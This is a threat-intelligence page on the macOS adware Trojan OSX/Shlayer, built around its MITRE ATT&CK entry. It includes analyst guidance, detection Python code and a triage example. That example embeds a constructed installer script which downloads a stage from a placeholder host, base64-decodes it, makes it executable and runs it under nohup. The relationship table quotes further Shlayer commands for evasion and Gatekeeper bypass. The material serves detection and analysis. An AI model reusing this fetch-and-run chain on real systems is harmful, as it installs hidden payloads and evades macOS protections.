
S0402: OSX/Shlayer

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[1][2]

Domain: Enterprise | ID: S0402 | Type: Malware | Object version: 1.4
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: High

OSX/Shlayer matters because it represents a macOS Trojan pattern that can turn user-driven execution into adware installation while using macOS-specific evasion and persistence behaviors. For leaders, the practical issue is not only “malware on Macs,” but whether the organization can see and control script execution, downloaded files, browser extension changes, privilege prompts, Gatekeeper-related events, hidden artifacts, and unexpected file transfers on macOS endpoints.

Executive priority

Treat this as a macOS endpoint resilience and evidence-readiness issue. If Macs are used by executives, developers, finance, or privileged administrators, gaps in macOS logging, endpoint management, browser extension governance, and user privilege controls can leave SOC and IR teams with weak evidence during an incident. Priority should go to validating macOS EDR/MDM coverage, browser extension inventory, least-privilege enforcement, and response playbooks for suspicious downloads, shell execution, and privilege prompts.

Technical view

ATT&CK provides no official detection text for OSX/Shlayer, so defenders should build validation around the related techniques: user-opened malicious files, Unix shell execution, system and file discovery, ingress tool transfer, deobfuscation, browser extension persistence, permission changes, elevated execution prompts, Gatekeeper bypass behavior, and macOS artifact hiding (hidden files and directories, resource forks, and payloads launched under nohup so they ignore hangup signals). SOC teams should confirm they can correlate a downloaded or user-launched file with its child shell processes, network retrieval of additional files, changes to browser extensions or configuration profiles where visible, permission or extended-attribute changes, and suspicious placement or naming that resembles legitimate resources.

Likely telemetry

  • macOS endpoint process creation and command-line telemetry, especially sh/bash/zsh activity spawned by downloaded or user-launched files
  • File creation, modification, rename, permission, hidden attribute, and extended attribute telemetry on macOS
  • Browser extension inventory and change events across managed browsers
  • MDM or endpoint management evidence for Gatekeeper, quarantine, notarization-related policy state, and configuration changes where available
  • Network telemetry for external file downloads or tool transfer from macOS hosts

Detection direction

  • Validate macOS-specific visibility rather than assuming Windows-centric endpoint rules apply.
  • Correlate user execution of downloaded files with shell child processes, discovery commands, external downloads, permission changes, and hidden artifact creation.
  • Tune for suspicious browser extension installation or modification, while accounting for legitimate enterprise-managed extensions.
  • Review events involving Gatekeeper bypass indicators, quarantine or extended attribute changes, and resource fork usage, recognizing that some administrative or developer workflows may create false positives.
  • Look for files placed in trusted-looking locations or named to resemble legitimate resources, especially when paired with recent download, shell execution, or network retrieval activity.
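The correlation the bullets above describe, as an added example that is not part of this page or of any vendor's tooling. It builds a process tree from constructed JSON-lines telemetry (a hypothetical schema with pid, ppid, image, cmdline and user, standing in for EDR process-creation events) and scores each shell subtree against the command shapes recorded in the relationship table below (mktemp, sw_vers, curl, tail -c +N, chmod, nohup, spctl, openssl/base64). The sample paths, PIDs, the example.invalid URL and the three-technique alert threshold are assumptions; a developer's zsh session is included as a benign control.

```python
"""Correlate macOS process telemetry into a Shlayer-style execution chain.

Added example. The JSON-lines event schema (pid, ppid, image, cmdline, user)
is a constructed stand-in for EDR process-creation telemetry, not any
vendor's format; the paths, PIDs and example.invalid URL are made up.
"""
import json
import re
from collections import defaultdict

# Constructed telemetry: a .command script run from a hidden directory on a
# mounted DMG spawns bash, which reads the OS version, downloads a carrier,
# carves a payload at a byte offset, marks it executable and launches it
# under nohup. A developer's zsh session is the benign control: it touches
# curl but nothing else.
SAMPLE_EVENTS = """
{"pid": 400, "ppid": 1, "image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmdline": "Terminal", "user": "alice"}
{"pid": 401, "ppid": 400, "image": "/bin/bash", "cmdline": "/bin/bash /Volumes/Player/.hidden/Install.command", "user": "alice"}
{"pid": 402, "ppid": 401, "image": "/usr/bin/mktemp", "cmdline": "mktemp -d /tmp/XXXXXXXXXXXX", "user": "alice"}
{"pid": 403, "ppid": 401, "image": "/usr/bin/sw_vers", "cmdline": "sw_vers -productVersion", "user": "alice"}
{"pid": 404, "ppid": 401, "image": "/usr/bin/curl", "cmdline": "curl -fsL https://example.invalid/stage2", "user": "alice"}
{"pid": 405, "ppid": 401, "image": "/bin/sh", "cmdline": "sh -c tail -c +1381 /tmp/Ab12Cd34Ef56/Installer", "user": "alice"}
{"pid": 406, "ppid": 405, "image": "/usr/bin/tail", "cmdline": "tail -c +1381 /tmp/Ab12Cd34Ef56/Installer", "user": "alice"}
{"pid": 407, "ppid": 401, "image": "/bin/chmod", "cmdline": "chmod +x /tmp/Ab12Cd34Ef56/payload", "user": "alice"}
{"pid": 408, "ppid": 401, "image": "/usr/bin/nohup", "cmdline": "nohup /tmp/Ab12Cd34Ef56/payload", "user": "alice"}
{"pid": 500, "ppid": 1, "image": "/bin/zsh", "cmdline": "zsh -lc brew update", "user": "bob"}
{"pid": 501, "ppid": 500, "image": "/usr/bin/curl", "cmdline": "curl -fsSL https://example.invalid/formula.rb", "user": "bob"}
"""

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/bin/ksh", "/bin/dash"}

# Command shapes from the ATT&CK procedure text, keyed by technique ID.
INDICATORS = [
    ("T1564.001", "hidden directory on a mounted volume", re.compile(r"/Volumes/[^ ]*/\.[^/ ]")),
    ("T1564", "mktemp-randomised payload name", re.compile(r"\bmktemp\b")),
    ("T1082", "OS version discovery", re.compile(r"\bsw_vers\b")),
    ("T1105", "curl download", re.compile(r"\bcurl\b")),
    ("T1059.004", "byte carving at an offset", re.compile(r"\btail\s+-c\s+\+\d+")),
    ("T1222.002", "payload marked executable", re.compile(r"\bchmod\s+(\+x|777)\b")),
    ("T1564.011", "hangup signal ignored", re.compile(r"\bnohup\b")),
    ("T1553.001", "Gatekeeper policy change", re.compile(r"\bspctl\b")),
    ("T1140", "payload decoding", re.compile(r"\b(openssl\s+enc\b|base64\s+(-d|-D|--decode)\b)")),
]


def parse_events(text):
    """Parse JSON-lines telemetry into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def descendants(children, pid):
    """Return every process below pid (breadth-first), excluding pid itself."""
    out, queue = [], list(children.get(pid, []))
    while queue:
        ev = queue.pop(0)
        out.append(ev)
        queue.extend(children.get(ev["pid"], []))
    return out


def match_techniques(root, subtree):
    """Map technique ID -> (label, pid) for the first process that matches it."""
    hits = {}
    for ev in [root] + subtree:
        for tid, label, rx in INDICATORS:
            if tid not in hits and rx.search(ev["cmdline"]):
                hits[tid] = (label, ev["pid"])
    return hits


def find_shlayer_chains(events, min_techniques=3):
    """Score each shell process by the distinct techniques seen in its subtree.

    min_techniques is an assumed threshold: a lone curl or chmod is normal on
    a developer Mac; several of these under one downloaded script is not.
    """
    children = defaultdict(list)
    for ev in events:
        children[ev["ppid"]].append(ev)
    findings = []
    for ev in events:
        if ev["image"] not in SHELLS:
            continue
        hits = match_techniques(ev, descendants(children, ev["pid"]))
        if len(hits) >= min_techniques:
            findings.append({
                "root_pid": ev["pid"],
                "user": ev["user"],
                "cmdline": ev["cmdline"],
                "techniques": sorted(hits),
                "evidence": {tid: hits[tid] for tid in sorted(hits)},
            })
    return findings


if __name__ == "__main__":
    for f in find_shlayer_chains(parse_events(SAMPLE_EVENTS)):
        print(f"pid {f['root_pid']} ({f['user']}): {f['cmdline']}")
        for tid, (label, pid) in f["evidence"].items():
            print(f"  {tid:<10} {label} (pid {pid})")
```

On the constructed input only the bash process launched from the hidden DMG directory is reported; the inner `sh -c tail ...` and the developer's `zsh` each match a single technique and stay below the threshold. Against real telemetry the indicator list is the part to tune: the regexes are deliberately loose, and the scoring, not any single command, is what carries the signal.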

Mitigation priorities

  • Ensure macOS endpoints are enrolled in managed endpoint security and MDM with auditable policy enforcement.
  • Limit routine administrator privileges and review workflows that train users to approve unexpected elevated execution prompts.
  • Enforce controlled software download and execution policies, including Gatekeeper and quarantine-related protections where appropriate.
  • Govern browser extensions through inventory, allowlisting or approval processes, and periodic review.
  • Collect and retain macOS process, file, network, browser, and management telemetry needed for incident reconstruction.

Analyst notes and limits

The relationship set makes this object useful for coverage assessment across macOS execution, persistence, privilege escalation, defense impairment, discovery, command-and-control, and stealth behaviors. The strongest defensive value is to use OSX/Shlayer as a macOS control-validation scenario: can the team prove what ran, what it downloaded, what it changed, whether it requested elevation, and whether it persisted through browser-related mechanisms?

MITRE does not provide official detection guidance, tactics are not specified on the malware object, and the supplied description is brief. This take is therefore based on the official description, external references, platform field, and ATT&CK relationships only. Local telemetry, endpoint configuration, browser fleet data, and user privilege models are required to determine actual exposure or coverage.

Official MITRE ATT&CK definition

OSX/Shlayer

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.[1][2]


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

15 rows. Columns: Domain, ID, Name, Relationship / procedure.
Enterprise T1564 Hide Artifacts

OSX/Shlayer has used the mktemp utility to make random and unique filenames for payloads, such as `export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"` or `mktemp -t Installer`. (Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: Shlayer jamf gatekeeper bypass 2021)

Enterprise T1564.001 Hidden Files and Directories Sub-technique

OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG. (Citation: Carbon Black Shlayer Feb 2019)

Enterprise T1222.002 Linux and Mac Permissions Sub-technique

OSX/Shlayer can use the chmod utility to set a file as executable, such as `chmod 777` or `chmod +x`. (Citation: 20 macOS Common Tools and Techniques)(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)

Enterprise T1204.002 Malicious File Sub-technique

OSX/Shlayer has relied on users mounting and executing a malicious DMG file. (Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

Enterprise T1176.001 Browser Extensions Sub-technique

OSX/Shlayer can install malicious Safari browser extensions to serve ads. (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)

Enterprise T1553.001 Gatekeeper Bypass Sub-technique

If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks. (Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)(Citation: objectivesee osx.shlayer apple approved 2020)

Enterprise T1059.004 Unix Shell Sub-technique

OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command `sh -c tail -c +1381...` to extract bytes at an offset from a specified file. OSX/Shlayer uses the `curl -fsL "$url" >$tmp_path` command to download malicious payloads into a temporary directory. (Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)

Enterprise T1564.011 Ignore Process Interrupts Sub-technique

OSX/Shlayer has used the `nohup` command to instruct executed payloads to ignore hangup signals. (Citation: Shlayer jamf gatekeeper bypass 2021)

Enterprise T1140 Deobfuscate/Decode Files or Information

OSX/Shlayer can base64-decode and AES-decrypt downloaded payloads. (Citation: Carbon Black Shlayer Feb 2019) Versions of OSX/Shlayer pass encrypted and password-protected code to openssl and then write the payload to the /tmp folder. (Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)

Enterprise T1036.005 Match Legitimate Resource Name or Location Sub-technique

OSX/Shlayer can masquerade as a Flash Player update. (Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

Enterprise T1564.009 Resource Forking Sub-technique

OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners. (Citation: tau bundlore erika noerenberg 2020)(Citation: sentinellabs resource named fork 2020)

Enterprise T1083 File and Directory Discovery

OSX/Shlayer has used the command `appDir="$(dirname $(dirname "$currentDir"))"` and `$(dirname "$(pwd -P)")` to construct installation paths. (Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)

Enterprise T1082 System Information Discovery

OSX/Shlayer has collected the IOPlatformUUID, session UID, and the OS version using the command `sw_vers -productVersion`. (Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)

Enterprise T1105 Ingress Tool Transfer

OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the `curl -fsL "$url" >$tmp_path` command to download malicious payloads into a temporary directory. (Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)

Enterprise T1548.004 Elevated Execution with Prompt Sub-technique

OSX/Shlayer can escalate privileges to root by asking the user for credentials. (Citation: Carbon Black Shlayer Feb 2019)
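The T1059.004, T1105 and T1140 rows above describe an installer script that downloads a carrier with `curl -fsL`, carves the second stage out of it with `tail -c +N`, decodes it, marks it executable and launches it under nohup. The following is an added example of how an analyst triages such a script and reproduces the carve; it is not the malware's code and not any vendor's tool. The script text, the carrier, the second stage, the URL and the offset 1381 are all constructed (the offset only echoes the shape of the procedure text), and the openssl decryption that some versions add is deliberately not reproduced. The point it makes is the offset semantics: `tail -c +N` starts at byte N counted from 1, so N-1 bytes are skipped, and being off by one in either direction breaks the base64 decode.

```python
"""Triage a Shlayer-style installer script and carve the stage it references.

Added example, not the malware's code and not any vendor's tool. The script
below is a constructed, defanged stand-in whose command shapes follow the
ATT&CK procedure text (mktemp, sw_vers, curl -fsL, tail -c +N, chmod, nohup);
the URL, paths and offset are made up.
"""
import base64
import binascii
import re

SAMPLE_SCRIPT = r'''#!/bin/bash
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
os_ver="$(sw_vers -productVersion)"
url="https://example.invalid/stage2"
tmp_path="$tmpDir/Installer"
curl -fsL "$url" >$tmp_path
sh -c "tail -c +1381 $tmp_path | base64 --decode >$tmpDir/payload"
chmod 777 $tmpDir/payload
nohup $tmpDir/payload >/dev/null 2>&1 &
'''

# Constructed second stage; real stages are larger and often openssl-encrypted,
# which this example does not reproduce.
STAGE2 = b"#!/bin/bash\necho constructed-stage2\n"


def triage_script(text):
    """Pull the indicators an analyst wants out of the dropped script."""
    m_off = re.search(r"\btail\s+-c\s+\+(\d+)", text)
    m_tmp = re.search(r"\bmktemp\s+-d\s+([^\s)\"']+)", text)
    m_chmod = re.search(r"\bchmod\s+(\+x|[0-7]{3,4})\s+(\S+)", text)
    m_nohup = re.search(r"\bnohup\s+(\S+)", text)
    return {
        "urls": re.findall(r"https?://[^\"'\s]+", text),
        "tail_offset": int(m_off.group(1)) if m_off else None,
        "tmp_template": m_tmp.group(1) if m_tmp else None,
        "chmod_mode": m_chmod.group(1) if m_chmod else None,
        "nohup_target": m_nohup.group(1) if m_nohup else None,
        "uses_openssl": bool(re.search(r"\bopenssl\s+enc\b", text)),
        "checks_os_version": bool(re.search(r"\bsw_vers\b", text)),
    }


def build_carrier(stage, offset):
    """Constructed carrier: offset-1 bytes of filler, then the base64 stage."""
    filler = b"#!/bin/bash\n# carrier stub\n"
    pad = (filler * (offset // len(filler) + 1))[: offset - 1]
    return pad + base64.b64encode(stage)


def tail_c_plus(data, offset):
    """Python equivalent of `tail -c +N`: bytes from position N, 1-indexed."""
    if offset < 1:
        raise ValueError("tail -c +N requires N >= 1")
    return data[offset - 1:]


def carve_stage(carrier, offset):
    """Carve at the script's offset and base64-decode, as the script does."""
    return base64.b64decode(tail_c_plus(carrier, offset), validate=True)


def offset_decodes(carrier, offset):
    """True only when the carve lands exactly on the base64 blob."""
    try:
        carve_stage(carrier, offset)
        return True
    except (binascii.Error, ValueError):
        return False


if __name__ == "__main__":
    iocs = triage_script(SAMPLE_SCRIPT)
    carrier = build_carrier(STAGE2, iocs["tail_offset"])
    print(iocs)
    print(carve_stage(carrier, iocs["tail_offset"]).decode())
    for off in (iocs["tail_offset"] - 1, iocs["tail_offset"], iocs["tail_offset"] + 1):
        print(off, "decodes" if offset_decodes(carrier, off) else "fails")
```

When carving a real carrier, take the offset from the script rather than hunting for a base64 boundary by eye: a one-byte miss on either side produces a decode error here because the blob length no longer fits base64's 4-character groups, and on a padded or larger blob it can silently produce garbage instead.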


Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the same object can be compared across releases by object version, MITRE modification timestamp and raw hash. For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).

ATT&CK release: 19.1
Object version: 1.4
Raw hash: 0086df520da8553c...

Imported snapshots across ATT&CK releases (1). Columns: Release, Bundle imported, Object version, Modified, Status, Raw hash.

19.1 | (not recorded) | 1.4 | (not recorded) | Current bundle | 0086df520da8…

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. Carbon Black Shlayer Feb 2019: Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
  2. Intego Shlayer Feb 2018: Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.
  3. Crossrider (alias): (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)
  4. Intego Shlayer Apr 2018: Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.
  5. Malwarebytes Crossrider Apr 2018: Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.
  6. OSX/Shlayer (alias): (Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)
  7. Zshlayer (alias): (Citation: sentinelone shlayer to zshlayer)
  8. mitre-attack S0402: the ATT&CK object page for S0402 on attack.mitre.org.
  9. sentinelone shlayer to zshlayer: Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.